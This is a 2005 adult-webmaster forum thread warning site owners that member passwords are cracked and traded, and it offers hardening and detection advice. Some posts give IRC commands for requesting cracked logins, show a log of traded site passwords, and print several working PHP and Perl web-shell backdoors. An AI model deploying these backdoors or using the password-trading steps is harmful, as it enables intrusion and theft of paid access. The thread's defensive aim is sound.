GoFuckYourself.com - Adult Webmaster Forum
Old 04-25-2005, 03:50 PM   #1
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
How easy is it to get a password to just about any pornsite?

How easy is it to get a password to just about any pornsite?

Very FUCKING easy!

In this thread I will attempt to get webmasters to actually do something about their BW and customer service costs.

I bet you webmasters don't even realize just how many passwords are given out in a day. If you did, I am sure you would do something about it. I hear it all the time, "We actually give out passwords to 'password boards' to have them fail in a few hours and try to get people to buy based on the 401 error page and popup consoles." What you don't realize is that most people don't get passwords from fake password boards.

Surfers are not stupid anymore. First we will look at one of the oldest technologies, newsgroups. Go to your favorite reader and plug into alt.sex.passwords, a newsgroup that has been giving out passwords since before there was an internet (it used to give them out for subscription porn BBS's). Here you will see anywhere from 10's to 100's of passwords given out daily. Just request one and see how fast you get a reply.

Next we can go to the IRC. Another old technology. Get where we are going? You guessed it (maybe), Alt.Sex.Passwords again ;) . This time we go to www.mirc.com and download the latest copy. Then load it up and login to thundercity.net. Perhaps the easiest way is this command:

/server irc.thundercity.net

Then /join #asp

Now you can make a request in this format,

!request http://members.url.com/members_area (billing_company)

Someone is going to crack you a password in 0 seconds to 1 hour or so. I said 0 seconds because someone might have cracked a ton of passwords for your site already. When someone does this, they usually set up a script to automatically fill your request.

Now you are thinking, "So fucking what, I have the most leet password management scripts known to man (or woman). They will block these fuckers!" Sorry, but no, they won't. Why not? Because AOL sucks balls, that is why! You had to set it so that 3 to 5 people can use a password with the same IP and the AOL modem/ADSL users can use your service without getting blocked. "Right." you say, "But these people are giving the same passwords to multiple people every few minutes, they WILL get blocked!" Wrong, I say... If you have two systems at your work space, ask for the same password from each different machine. Someone will crack you 2 different passwords... And the other 30 people? They will get 30 different passwords... It is actually "bad etiquette" for a cracker to give the same password to 2 people within 2 hours time.

Most people who sign on to the IRC don't use proxies. In fact, IRC networks try to make it really hard to do so. So you can watch someone get one of your passwords and then see what happens in your logs. Or better yet, watch for a 1 hour period. Say 20 people ask for your site in that time frame. Then also keep track of legit users in the same time frame. GREP your logs for their IP's and see how much BW they are using. Compare it to the BW the legit users are using. Is it 20%? 25%? 50%? more?

See how many passwords get blocked. Do any? If 5 do, then do the legit users cancel them or chargeback instead of getting them reactivated? Does the customer service agent make them feel like suspects (password sharing) instead of victims (password cracking)? Do they reset the password with the same password so this happens again?

OK.. now let's try a password forum.

http://www.xxxhq.com/vb/index.php

Here you will find passwords that people have cracked and posted. You can usually find working passwords for your favorite sites. The major problem with this method is that you are going to have upwards of 100 people try a password at the same time. Killing it. It is common that if you post 200 passwords for a big site like [insert_your_idea_of_a_big_site_here], the passwords will die en masse. Why is this a problem? Because it is a customer service nightmare when 200 passwords are killed in 2 hours. 1 to 5 chargebacks? 10 to 20 cancels? 5 to 30 refunds? I dunno. I don't run a program, but I am sure you see numbers somewhere near these. Resetting the remaining 150 passwords = fun? I didn't think so.

I didn't write this to give GFY surfers a free ride. I wrote it to let you know that you all have problems in some form... Well, 95% of you do. How can you fix this shit? First, use a form login. Crackers HATE form logins. Basic Authentication (the grey popup) can be cracked at speeds as high as 150,000 tries per hour. Forms are about 8,000 to 25,000. No one wants to do them.

But people WILL, IF THEY HAVE TO. So you need something even better. So you need a security code. Not a run-of-the-mill one either. The numbers and letters need to mix with their backgrounds so that there is little contrast. A program named Caecus can read the run-of-the-mill ones pretty easy, but it relies on contrast to do so. Skewing the numbers and letters also helps.

Now you have 1/2 of the battle won. Finding working passwords is a bitch for a cracker now. But what about the hacker? They are still getting in and getting passwords. To combat them you need to properly create and secure passwords.

#1, Make your own passwords. Do not let a user choose their password, ever. These passwords should be made out of both upper and lowercase letters and with numbers. They should be 8 characters in length.

#2, NEVER store unencrypted passwords on the server. NEVER EVER! If you generate your own passwords and a hacker steals the unencrypted ones, you are screwed.

#3, Store passwords in a bitchy format like MD5. MD5 passwords can be cracked at about 5,000 c/s and DES can be done at 150,000 c/s or more. Which one is the better choice?

Now assuming you followed rules 1, 2 and 3 you have the other 1/2 of the problem fixed. Now even if a hacker steals your DB, they have passwords that they cannot crack. But what if a customer forgets their password? Simple, write a script just like the one that resets your password here at GFY.

Still not thinking the problem is HUGE? ( -m allows you to connect to another server without disconnecting from the current one.)

/server -m mesra.kl.my.dal.net
/list xxx

then,

/server -m mesa.az.us.undernet.org
/list xxx

I could go on but I think you will quickly see just how much of a pain in the ass this kind of password cracking is.

This is also a call to programmers. If you can offer solutions like the login script or password reset scripts, reply here! Offer your services. I am sure there are about 3,000 websites that need them.
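The one-hour log check described in the post above (distinct addresses per member login, bandwidth share, bursts of 401s), as an added example that is not part of the original post. It assumes Apache common/combined log lines with the authenticated user in the third field; the 5-address limit, the 20-failure threshold, the function names and every sample line are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# host ident authuser [time] "request" status bytes  (Apache common log prefix)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<req>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)


def parse(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "user": m["user"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "status": int(m["status"]),
        "bytes": 0 if m["bytes"] == "-" else int(m["bytes"]),
    }


def shared_accounts(records, max_ips=5, window=timedelta(hours=1)):
    """Logins used successfully from more than max_ips addresses inside any window.

    max_ips=5 mirrors the 3-to-5 allowance for proxy-pool users in the post.
    Returns {user: peak number of distinct addresses}.
    """
    by_user = defaultdict(list)
    for r in records:
        if r["user"] != "-" and r["status"] < 400:
            by_user[r["user"]].append((r["ts"], r["ip"]))
    flagged = {}
    for user, hits in by_user.items():
        hits.sort()
        start, peak = 0, 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1
            peak = max(peak, len({ip for _, ip in hits[start:end + 1]}))
        if peak > max_ips:
            flagged[user] = peak
    return flagged


def bandwidth_share(records, users):
    """Fraction of all bytes served that went to the given logins."""
    total = sum(r["bytes"] for r in records)
    used = sum(r["bytes"] for r in records if r["user"] in users)
    return used / total if total else 0.0


def failed_login_sources(records, min_failures=20):
    """Addresses that produced at least min_failures 401 responses."""
    counts = defaultdict(int)
    for r in records:
        if r["status"] == 401:
            counts[r["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= min_failures}


def sample_log():
    """Constructed log lines: documentation IP ranges, made-up logins."""
    fmt = ('{ip} - {user} [25/Apr/2005:{hh:02d}:{mm:02d}:00 +0000] '
           '"GET {path} HTTP/1.0" {status} {size}')
    lines = []
    for i in range(2):    # one member seen from two addresses
        lines.append(fmt.format(ip=f"192.0.2.{10 + i}", user="alice", hh=15,
                                mm=5 * i, path="/members/a.jpg",
                                status=200, size=1000000))
    for i in range(8):    # one login used from eight addresses in 35 minutes
        lines.append(fmt.format(ip=f"198.51.100.{i + 1}", user="bob", hh=15,
                                mm=5 * i, path="/members/v.mpg",
                                status=200, size=1000000))
    for i in range(25):   # one address failing Basic auth 25 times
        lines.append(fmt.format(ip="203.0.113.9", user=f"guess{i}", hh=16,
                                mm=i, path="/members/", status=401, size="-"))
    return lines


if __name__ == "__main__":
    recs = [r for r in map(parse, sample_log()) if r]
    flagged = shared_accounts(recs)
    print("shared logins:", flagged)
    print("their share of bandwidth:", bandwidth_share(recs, set(flagged)))
    print("401 sources:", failed_login_sources(recs))
```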
Old 04-25-2005, 04:17 PM   #2
TheDoc
Too lazy to set a custom title
 
Join Date: Jul 2001
Location: Currently Incognito
Posts: 13,827
http://www.bettercgi.com/strongbox/

Problems solved..
__________________
~TheDoc - ICQ7765825
It's all disambiguation
Old 04-25-2005, 04:18 PM   #3
newbreed
Confirmed User
 
 
Join Date: Nov 2003
Location: ThatOneProgram.com
Posts: 9,898
Quote:
Originally Posted by TheDoc

No fucking doubt man.
__________________

Loryn ‎(3:16 PM):
I love it, just as long as we keep the bedroom door closed from all ears then we can have throw down hard core sex that makes us money haha
fuck it we can have sex on money never did that before
Old 04-25-2005, 04:19 PM   #4
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
High times can i buy your sig for 300/month ?
__________________
I like turtles.
Old 04-25-2005, 04:21 PM   #5
newbreed
Confirmed User
 
 
Join Date: Nov 2003
Location: ThatOneProgram.com
Posts: 9,898
Quote:
Originally Posted by sonofsam
High times can i buy your sig for 300/month ?




Old 04-25-2005, 04:22 PM   #6
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by TheDoc
Nice solution. Got a site it is on so I can check it out?
Old 04-25-2005, 04:23 PM   #7
newbreed
Confirmed User
 
 
Join Date: Nov 2003
Location: ThatOneProgram.com
Posts: 9,898
Quote:
Originally Posted by High_Times
Nice solution. Got a site it is on so I can check it out?

www.arikaames.com
Old 04-25-2005, 04:23 PM   #8
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by sonofsam
High times can i buy your sig for 300/month ?
Can you afford it?
Old 04-25-2005, 04:23 PM   #9
AlienQ - BANNED FOR LIFE
best designer on GFY
 
 
Join Date: Mar 2003
Location: IALIEN.COM - High Definition Video and Photographic Productions -ICQ 78943384
Posts: 30,307
For 6 posts he is really knockin out some great BS and Misinformation.

But hey it's always fun to forget everything ya know...
Lets enjoy the fantasy.
Old 04-25-2005, 04:25 PM   #10
newbreed
Confirmed User
 
 
Join Date: Nov 2003
Location: ThatOneProgram.com
Posts: 9,898
Quote:
Originally Posted by AlienQ
For 6 posts he is really knockin out some great BS and Misinformation.

But hey it's always fun to forget everything ya know...
Lets enjoy the fantasy.
No doubt.
Old 04-25-2005, 04:25 PM   #11
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
Quote:
Originally Posted by High_Times
Can you afford it?
no actually i can't i was gonna ask newbreed to pay the upfront cost, and then since your sig will get clicked so much that i'll split the profit with him
Old 04-25-2005, 04:27 PM   #12
Jay_StandAhead
Confirmed User
 
Join Date: Jul 2002
Posts: 3,103
pennywize has done wonders for us.
Old 04-25-2005, 04:28 PM   #13
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by newbreed
Nice. The one flaw is that this is fixing the 1st half of the problem. The crackers. They cannot get in. You still need to work on the hackers. Also the site allows the users to generate their own passwords. If the website itself is ever hacked, then a hacker will have an easy time decrypting them.
Old 04-25-2005, 04:29 PM   #14
newbreed
Confirmed User
 
 
Join Date: Nov 2003
Location: ThatOneProgram.com
Posts: 9,898
HT, go back to smoking herb, you appear to be better at that than posting here.

SOS, does he have a sig yet? If so, what an embarrassing mistake by any company who would let him link up.
Old 04-25-2005, 04:29 PM   #15
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
Quote:
Originally Posted by High_Times
Nice. The one flaw is that this is fixing the 1st half of the problem. The crackers. They cannot get in. You still need to work on the hackers. Also the site allows the users to generate their own passwords. If the website itself is ever hacked, then a hacker will have an easy time decrypting them.
thats a very good point... i think you should email the pentagon and let them know that if their site gets hacked they are vulnerable once the hackers are inside
Old 04-25-2005, 04:30 PM   #16
newbreed
Confirmed User
 
 
Join Date: Nov 2003
Location: ThatOneProgram.com
Posts: 9,898
Quote:
Originally Posted by High_Times
Nice. The one flaw is that this is fixing the 1st half of the problem. The crackers. They cannot get in. You still need to work on the hackers. Also the site allows the users to generate their own passwords. If the website itself is ever hacked, then a hacker will have an easy time decrypting them.



The clueless ones are always the best!!!!!!!!
Old 04-25-2005, 04:31 PM   #17
AlienQ - BANNED FOR LIFE
best designer on GFY
 
 
Join Date: Mar 2003
Location: IALIEN.COM - High Definition Video and Photographic Productions -ICQ 78943384
Posts: 30,307
Anything can be cracked and hacked...
Big Whoooop

Tell us something new, are you wasting any talent you have just to get into a porn site?

Let us know when you can Crack IBILL to find out exactly whats going on.
Old 04-25-2005, 04:33 PM   #18
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
did you know if hackers got into your server, that it's bad?
Old 04-25-2005, 04:42 PM   #19
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Now I know how Jesus felt...

Pretty much all who have posted are sheep. I think that is obvious.

If a hacker steals your DB and cannot use the DB then you have still won. If you are too thick to realize that then you are a sheep.

Example,
Code:
<coldrage> http://www.ravenriley.com/members/ sent to Dean
<AVSbot> adultcheck.com_gold sent to Pichou [#16288]
<coldrage> http://members.cohf.net/ageverif/cohfageverif.cgi sent to stanley334
<rAz0r> http://www.lfpcontent.com/hustler/ sent to nomit
<rAz0r> http://www.amkingdom.com/protected/mea1x.htm sent to Kihadissa
<AVSbot> ageticket sent to chaarlie [#16299]
<AVSbot> bondagepass.com sent to jkahr [#16300]
<coldrage> http://members.oxpassport.com/ sent to gapup
<coldrage> http://login.givemepink.com/ sent to dubc
<coldrage> http://login.spermswap.com/login.cgi sent to tomy
<coldrage> http://members.cohf.net/ageverif/cohfageverif.cgi sent to sprimal
<AVSbot> adultcheck.com_gold sent to FalconX [#16308]
<AVSbot> ageticket sent to GreyLizard [#16310]
<coldrage> http://login.allinternal.com/login.cgi sent to ChromoX
The latest cracked passwords on ASP... Perfectgonzo creates the user's password. They also use a kickass login script and password management script. But it is painfully obvious that it didn't even make a lick of difference. They stored the passwords unencrypted on their server and now the hackers give those out. They also backdoored the server with <? if(isset($cmd)) { passthru($cmd); } ?> scripts. So they can get today's updated working list.

You can call me scum, poser or whatever you'd like. The truth is I know more than you probably ever will and for some reason that scares you more than the knowledge you'd gain by listening.
Old 04-25-2005, 04:44 PM   #20
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
good thing you posted a screenshot of peoples passwords being given out.... you know... because the reason you got flamed was because we didn't believe that passwords were being cracked



i should probably mention that i was being sarcastic
Old 04-25-2005, 04:46 PM   #21
stev0
Confirmed User
 
 
Join Date: Aug 2003
Location: Calgary, Alberta
Posts: 6,801
Wow, someone actually addresses a real issue on GFY and look at the responses...

That's just sad...
Old 04-25-2005, 04:48 PM   #22
AlienQ - BANNED FOR LIFE
best designer on GFY
 
 
Join Date: Mar 2003
Location: IALIEN.COM - High Definition Video and Photographic Productions -ICQ 78943384
Posts: 30,307
K...

Right about now I am waiting for the sales pitch...

Password problems have always been a problem since day one.
What you're saying is really umm...

Nothing new...
So what are you selling?
Old 04-25-2005, 04:52 PM   #23
KMR Stitch
I am cool
 
Join Date: Jul 2003
Posts: 14,494
Good post HT.

Fuck the haters
Old 04-25-2005, 04:53 PM   #24
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
I am not selling anything. Not a service. Not a device. Not a piece of software.

I am simply telling you the three things you need to be smarter and to STOP being cracked/hacked for passwords.

Form with security code.
Server made passwords (8 characters minimum).
Stored encrypted with MD5 or something else equally hard to crack.
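An added example, not from the thread, of the server-made-password and no-plaintext-storage points listed in the post above, including the reset path for a member who forgets the password. It swaps in salted PBKDF2-HMAC-SHA256 from Python's standard library for the MD5 the post names; the function names, the record format and the iteration count are assumptions of this example.

```python
import base64
import hashlib
import hmac
import secrets
import string

ALPHABET = string.ascii_letters + string.digits  # upper, lower and digits
ITERATIONS = 600_000                             # assumption: tune per server


def generate_password(length=10):
    """Server-made password with at least one lowercase, uppercase and digit."""
    if length < 8:
        raise ValueError("length must be at least 8")
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if (any(c.islower() for c in pw)
                and any(c.isupper() for c in pw)
                and any(c.isdigit() for c in pw)):
            return pw


def hash_password(password, iterations=ITERATIONS):
    """Return a self-describing record: scheme$iterations$salt$derived_key."""
    salt = secrets.token_bytes(16)  # per-record salt: equal passwords differ
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_password(password, record):
    """Recompute the key from the stored salt and compare in constant time."""
    try:
        scheme, iters, salt_b64, dk_b64 = record.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(dk_b64)
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 salt, int(iters))
    except (ValueError, TypeError):
        return False  # malformed record: fail closed
    return hmac.compare_digest(dk, expected)


def reset_password(store, username):
    """Forgotten password: issue a new one, never recover the old one.

    `store` is a hypothetical {username: record} mapping standing in for the
    member database. The plaintext is returned once, for delivery to the member.
    """
    if username not in store:
        raise KeyError(username)
    new_pw = generate_password()
    store[username] = hash_password(new_pw)
    return new_pw


if __name__ == "__main__":
    members = {"member1": hash_password(generate_password())}
    issued = reset_password(members, "member1")
    print("stored record:", members["member1"])
    print("new password verifies:", verify_password(issued, members["member1"]))
```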
Old 04-25-2005, 04:54 PM   #25
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
Quote:
Originally Posted by High_Times
I am not selling anything. Not a service. Not a device. Not a piece of software.

I am simply telling you the three things you need to be smarter and to STOP being cracked/hacked for passwords.

Form with security code.
Server made passwords (8 characters minimum).
Stored encrypted with MD5 or something else equally hard to crack.
everyone i've talked to who has used strongbox doesn't have a problem with their passwords being distributed over irc / password forums / etc etc
Old 04-25-2005, 04:54 PM   #26
AlienQ - BANNED FOR LIFE
best designer on GFY
 
 
Join Date: Mar 2003
Location: IALIEN.COM - High Definition Video and Photographic Productions -ICQ 78943384
Posts: 30,307
PHHhhh...

Thanks you wasted my time...
Old 04-25-2005, 04:59 PM   #27
AlienQ - BANNED FOR LIFE
best designer on GFY
 
 
Join Date: Mar 2003
Location: IALIEN.COM - High Definition Video and Photographic Productions -ICQ 78943384
Posts: 30,307
HighTimes I like ya already.

Ya got "That Aggression" turn it into cash
Old 04-25-2005, 04:59 PM   #28
Jace
FBOP Class Of 2013
 
Join Date: Jan 2004
Location: bumfuck, ky
Posts: 35,562
all my sites are protected strictly with iprotect, server made 10 character alpha numeric passwords and encrypted on a separate server with MD5....
Old 04-25-2005, 05:01 PM   #29
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Code:
grep -R -i passthru ./
Run this in the home directory of your websites.

Example,

/home/sites/website1.com
/home/sites/website2.com

Run it in /home/sites so that it covers them all... If you find a script that resembles the one I posted previously, you've been hacked.
Old 04-25-2005, 05:22 PM   #30
bigmack
Confirmed User
 
Join Date: Feb 2005
Posts: 329
Quote:
Originally Posted by High_Times
Code:
grep -R -i passthru ./
Run this in the home directory of your websites.

Example,

/home/sites/website1.com
/home/sites/website2.com

Run it in /home/sites so that it covers them all... If you find a script that resembles the one I posted previously, you've been hacked.

Well I guess that was the silver nail that was drove home in the casket, no replies for a while now.
Old 04-25-2005, 05:29 PM   #31
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Backdoor scripts,

Code:
<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?>

<?passthru(stripslashes("echo;".getenv("HTTP_ACCEPT_IP")));?>

<pre><? if ($f) { ?><form method=post><textarea name=f rows=3 cols=50><? echo $f?></textarea><input type=submit></form><? $e = "$f 2>&1"; $g= `$e`; echo "<pre>".$g."</pre>"; }?>

<?php passthru("echo;".getenv("HTTP_ACCEPT_IP"));?>

<pre><? if ($f) { ?><form method=post><textarea name=f rows=3 cols=50><? echo $f?></textarea><input type=submit></form><? $e = "$f 2>&1"; $g= `$e`; echo "<pre>".$g."</pre>"; }?>

CGI Version,

#!/usr/bin/perl
use CGI qw(:standard);print header;$d = $ENV{"HTTP_ACCEPT_LANGUAGE"};{$l=`$d 2>&1`;print pre($l);};
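The `grep -R -i passthru` sweep from post #29, widened to the backtick and CGI variants listed in post #31, as an added example that is not code from the thread. It goes beyond the single keyword by also matching other shell-execution calls and by ranking a hit higher when the same line reads a request header or superglobal; the patterns, extension list, function names and sample files are assumptions of this example (two samples reuse lines quoted in the posts).

```python
import os
import re
import tempfile

# Calls and operators that hand a string to the OS shell (PHP and Perl CGI).
EXEC_RE = re.compile(
    r'\b(passthru|system|shell_exec|exec|popen|proc_open)\s*\('
    r'|`[^`\n]*\$[^`\n]*`',            # backticks wrapping a variable
    re.I,
)
# Request-controlled sources appearing on the same line as the sink.
TAINT_RE = re.compile(
    r'\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b'
    r'|getenv\s*\(\s*["\']HTTP_'
    r'|\$ENV\{\s*["\']?HTTP_',
    re.I,
)
SCRIPT_EXT = {".php", ".php3", ".phtml", ".inc", ".cgi", ".pl"}


def scan_text(text):
    """Return [(line number, severity, sink)] for one file's contents.

    "high" means a shell sink and a request source share a line; "review"
    means a shell sink alone, which needs a human to decide.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in EXEC_RE.finditer(line):
            sink = (m.group(1) or "backticks").lower()
            severity = "high" if TAINT_RE.search(line) else "review"
            findings.append((lineno, severity, sink))
    return findings


def scan_tree(root, extensions=SCRIPT_EXT):
    """Walk every site under root; pass extensions=None to read all files."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if extensions and ext not in extensions:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip, do not abort the sweep
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            results.extend((rel, *f) for f in scan_text(text))
    return sorted(results)


# Constructed sample tree standing in for /home/sites.
SAMPLES = {
    "site1/images/thumb.php":
        '<?php passthru(getenv("HTTP_ACCEPT_LANGUAGE"));?>\n',
    "site1/cgi-bin/stat.cgi":
        '#!/usr/bin/perl\n$d = $ENV{"HTTP_ACCEPT_LANGUAGE"};$l=`$d 2>&1`;\n',
    "site2/index.php":
        '<?php\n$title = "Members";\necho htmlspecialchars($title);\n?>\n',
    "site2/resize.php":
        '<?php\nexec("convert in.jpg -resize 100 out.jpg");\n',
}


def demo():
    """Write SAMPLES to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, lineno, severity, sink in demo():
        print(f"{severity:6} {rel}:{lineno} {sink}")
```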
Old 04-25-2005, 05:30 PM   #32
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
High_times i'm just curious.. what paysite do you run ?
Old 04-25-2005, 05:31 PM   #33
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
netstat -a|grep LISTEN

Is someone running an IRC botnet on your BW and server? Running a backdoor to get on later?
Old 04-25-2005, 05:31 PM   #34
KMR Stitch
I am cool
 
Join Date: Jul 2003
Posts: 14,494
grep ahh I remember cisco's protocols =)
Old 04-25-2005, 05:31 PM   #35
TheDoc
Too lazy to set a custom title
 
Join Date: Jul 2001
Location: Currently Incognito
Posts: 13,827
HT... Most sites don't get hacked, sites like perfectgonzo didn't get hacked. The pw leaks are from brute force attacks. No protection software can stop the attacks 100%.
Old 04-25-2005, 05:40 PM   #36
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by sonofsam
High_times i'm just curious.. what paysite do you run ?
I will not get into what I do in the adult industry because I'd become an obvious target for hackers ;)

BTW, they really like the thread tracking services since they allow the hackers to stay up to date on what you are doing to stop them.
Old 04-25-2005, 05:41 PM   #37
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by TheDoc
HT... Most sites don't get hacked, sites like perfectgonzo didn't get hacked. The pw leaks are from brute force attacks. No protection software can stop the attacks 100%.

I know they did get hacked. I know how they got hacked. I won't spell it out here. You can easily find it by surfing the link to their join page. Dammit... well, I gave some of it away.
Old 04-25-2005, 05:44 PM   #38
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by KMR Stitch
grep ahh I remember cisco's protocols =)
Actually that is a UNIX shell command.
Old 04-25-2005, 05:45 PM   #39
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
why are you more a target than anyone else?
Old 04-25-2005, 05:58 PM   #40
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by sonofsam
why are you more a target than anyone else?
Ask yourself why certain webmasters catch hackers red handed and then never turn them in? Why hasn't the LA Times printed a story about every single MPA2 customer getting hacked? Why not a story about add-passwd.cgi being hackable before the check for WNU.com's IP? Why not a story about CCBILL leaving the logs directory world readable by default?

Because no webmaster wants retribution from hackers who read the story and then say, "Ohh, you thought that was cute? Wait until this..."
Old 04-25-2005, 06:00 PM   #41
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
i may be wrong but i have a hard time believing that whatever it is you do that

posting your site on gfy = getting hacked
Old 04-25-2005, 06:03 PM   #42
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by sonofsam
i may be wrong but i have a hard time believing that whatever it is you do that

posting your site on gfy = getting hacked
The former...
Old 04-25-2005, 06:06 PM   #43
sonofsam
Too lazy to set a custom title
 
Join Date: Dec 2004
Location: Vancouver
Posts: 18,589
Quote:
Originally Posted by High_Times
The former...
well i guess we'll never know since you wont say what site you own
Old 04-25-2005, 06:13 PM   #44
swedguy
Confirmed User
 
Join Date: Jan 2002
Posts: 7,981
Hmmm, talk about easy.
Old 04-25-2005, 06:18 PM   #45
TheDoc
Too lazy to set a custom title
 
Join Date: Jul 2001
Location: Currently Incognito
Posts: 13,827
The PW leaks are from Brute Force attacks and/or members giving up the information. I ran my sites, 2 dead, one trial members area.. They won't link to auth form sites.

I couldn't find any of the perfect gonzo sites that worked.
Old 04-25-2005, 06:21 PM   #46
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by JaceXXX
all my sites are protected strictly with iprotect, server made 10 character alpha numeric passwords and encrypted on a separate server with MD5....
Not only are you protecting yourself, you are protecting the industry. You are also protecting yourself twice over.

If you run a single girl teen site and someone steals your unencrypted passwords (or encrypted ones with DES and customer made passwords) then you have just fucked over everyone else running a single girl site that is using Basic Authentication. It is highly likely that you share members either concurrently or consecutively. Your 3,000 user passfile or 30,000 user log file is like a 150 user passfile or 1000 user passfile respectively to the other sites.

You protect yourself twice over because if hackers can't get anyones working passwords, they can't crack logins. If they can't crack logins then people will have no choice but to pay for porn.

Congrats, you just increased your income a small percentage. But it will take the entire industry to get on the same bandwagon for the percentage to really shoot up. The percentage of increased income is directly related to the percentage of same niche sites that protect themselves like you have.
Old 04-25-2005, 06:25 PM   #47
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by TheDoc
The PW leaks are from Brute Force attacks and/or members giving up the information. I ran my sites, 2 dead, one trial members area.. They won't link to auth form sites.

I couldn't find any of the perfect gonzo sites that worked.

Damn, BAB is a hot as all hell site!
Old 04-25-2005, 06:45 PM   #48
TheDoc
Too lazy to set a custom title
 
Join Date: Jul 2001
Location: Currently Incognito
Posts: 13,827
Quote:
Originally Posted by High_Times
Damn, BAB is a hot as all hell site!
I can't find a working PW for the main site, only for the trial site.. Which is fine, surfers make us money.
Old 04-25-2005, 07:10 PM   #49
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
Quote:
Originally Posted by TheDoc
I can't find a working PW for the main site, only for the trial site.. Which is fine, surfers make us money.
Then you made my point. This message isn't for you or JaceXXX unless it is to applaud your attention to security.

This message is for the hundreds of other sites and sponsors who are not taking these matters seriously.
Old 04-25-2005, 07:13 PM   #50
High_Times
Confirmed User
 
Join Date: Apr 2005
Posts: 115
http://trial.theinnerzone.com/upgrade.php

You get 2 buttons to upgrade with. I clicked BAB and got,

Upgrade Error!


Could not find your membership, please try again. The Email Address you entered might be different from one on the file.

If this problem persists, please contact BillingSupport.com from the following page: http://www.billingsupport.com/inquiry.html

Last edited by High_Times; 04-25-2005 at 07:15 PM..